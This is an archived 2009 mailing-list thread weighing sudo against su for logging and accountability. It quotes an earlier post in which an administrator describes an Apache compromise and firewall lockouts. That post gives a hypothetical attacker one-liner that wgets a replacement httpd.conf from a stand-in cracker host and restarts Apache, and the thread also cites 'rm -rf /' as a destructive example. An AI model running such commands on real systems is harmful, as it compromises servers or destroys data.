[Leaplist] sudo vs su

Mon Jun 1 13:44:30 EDT 2009

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

The www user has su or sudo access?  That would be a pretty horrible idea.

Richard F. Ostrow Jr. wrote:
> Jim,
> 
> For whatever reason, I never got your post (taken from Kevin's reply).
> 
> At any rate, as far as remote logging goes, it's more than just to track
> what you or your authorized users are doing - it's for tracking what
> remote attackers are doing and preventing them from covering their tracks.
> Sure, you probably wouldn't do anything as stupid as an "rm -rf /"... but
> would you do a "cd /usr/local/etc/apache2/ && wget
> http://somecracker.net/compromisedapacheconfs/httpd.conf &&
> /usr/local/etc/rc.d/apache2 restart"? You may not even see it happen.
> Granted, you probably wouldn't even with remote logging (unless you
> regularly check), but they can always wipe their activity from the log.
> 
> I state this because I was recently compromised with a 2-month old build
> of apache2. The hackers were not very sophisticated (did not cover their
> tracks), and never got root access (everything was done as www user), but
> it got me thinking about securing my boxes and how to adapt to various
> attacks (like locking out an IP address at the firewall level at a single
> failed SSH login - prevents brute force attacks, and if I lock myself out,
> I login from another server somewhere (sf.net, for instance) and reset
> it). It also tends to block people who inadvertently became a part of bot
> nets or similar when I get distributed brute force attacks (my logs do
> show as much, as I had at one point 250 login attempts for a single
> (nonexistent) user from 250 different IP addresses in under 1 minute). I
> also lock IP addresses out for other abuses (excessive connection attempts
> on any port, for instance... haven't gotten into trouble with this one
> (yet)).
> 
> Jim Hartley wrote:
>> Remote logging system???? I don't have a remote logging system. I have
>> just my one desktop machine here. In that context, does "sudo" have any
>> advantages? I am assuming that **I** am not going to do something stupid
>> like "rm -rf /"
>>
>> Jim Hartley
>>
>> Richard F. Ostrow Jr. wrote:
>>> Ok, now that we're actually talking in the right topic, here's the
>>> _correct_ answer.
>>>
>>> su - input not logged, difficult to backtrace what was done in the
>>> event
>>> of a catastrophic screwup (rm -rf /)
>>>
>>> sudo - can easily track what was done. Everything put into sudo goes
>>> into
>>> /var/log/{hostname}/messages of the remote logging system. An 'rm -rf
>>> /'
>>> would be logged on the remote machine, and I would know *exactly* who
>>> was
>>> stupid enough to do such a thing, and can make them clean up the mess.
>>>
>>> I wonder which one is better from an SA standpoint?
>>>
>>>
> 

- --
~*-,._.,-*~'`^`'~*-,._.,-*~'`^`'~*-,._.,-*~'`^`'~*-,._.,-*~'`^`'~*-,._.,-*~
	Kevin Korb			Phone:    (407) 252-6853
	Systems Administrator		Internet:
	FutureQuest, Inc.		Kevin at FutureQuest.net  (work)
	Orlando, Florida		kmk at sanitarium.net (personal)
	Web page:			http://www.sanitarium.net/
	PGP public key available on web site.
~*-,._.,-*~'`^`'~*-,._.,-*~'`^`'~*-,._.,-*~'`^`'~*-,._.,-*~'`^`'~*-,._.,-*~
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.11 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iEYEARECAAYFAkokE34ACgkQVKC1jlbQAQcI5wCgkQ0MO2dXE4RK0k/Pj5djOiFl
rgYAoP3H2hJHTfZSrN2bpKSOIe6fGU6V
=KHDh
-----END PGP SIGNATURE-----

-- 
This message has been scanned for viruses and
dangerous content by MailScanner, and is
believed to be clean.